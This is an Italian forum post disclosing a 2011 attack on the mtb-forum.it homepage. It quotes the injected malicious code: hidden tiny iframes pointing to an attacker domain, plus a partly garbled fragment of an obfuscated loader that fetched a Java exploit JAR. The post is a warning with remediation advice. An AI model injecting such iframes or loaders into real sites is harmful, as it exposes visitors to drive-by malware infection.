Attenzione update.
Questo non l'ho scritto prima, ma in data 31/5/2011 degli indiani hanno sfruttato una vulnerabilità in Wordpress ed hanno inserito del codice malevolo sulla homepage di "mtb-forum.it". Probabilmente la vulnerabilità sfruttata è la seguente:
[url]http://www.exploit-db.com/exploits/17299/[/URL]
Il codice iniettato era il seguente:
<iframe src='
[url]http://indometastan.in/in.cgi?default[/URL]' width='2' height='2'
frameborder='0'></iframe><iframe
src='
[url]http://indometastan.in/in.cgi?default[/URL]' width='2' height='2'
frameborder='0'></iframe><iframe
src='
[url]http://indometastan.in/in.cgi?default[/URL]' width='2' height='2'
frameborder='0'></iframe><br />
<b>Warning</b>: Cannot modify header information - headers already sent
by (output started at /home/www/wusr0001/index.php:1) in
<b>/home/www/wusr0001/wp-content/plugins/tgn-embed-everything/tgn-embed-everything.php</b>
on line <b>61</b><br />
<iframe src='
[url]http://indometastan.in/in.cgi?default[/URL]' width='2' height='2'
frameborder='0'></iframe>
<html xmlns=
"http://www.w3.org/1999/xhtml" dir="" lang="">
<head>
fortunatamente avevano implementato il
codice seguente per offuscare il codice malevolo, che lo rendeva
lentissimo da eseguire:
ar2="["+(document.getElementsByTagName("div")[1].innerHTML).replace(/c/g,",");
ar2=e(ar2);
s="";
a ="";
for (i=0;i!=ar2.length-2;i++){
q=ar2
;
e("s+=ar.substr(q / 7,1)");
}
Questo avrebbe fatto scaricare poi il seguente Jar dall'url fros63.cz.cc:
function end_redirect(){}var javafile='./games/getJavaInfo.jar'
Questo Jar non faceva altro che prendere la versione locale della Java
applet, per lanciare serie di exploit Java.
Nel mio caso Windows XP sp3 lanciava questo:
[url]http://www.zerodayinitiative.com/advisories/ZDI-10-056/[/URL]
Consiglio a tutti coloro che hanno visitato il sito in quel giorno di fare una
scansione antivirus, soprattutto se la visione è avvenuta da una macchina Windows o MacosX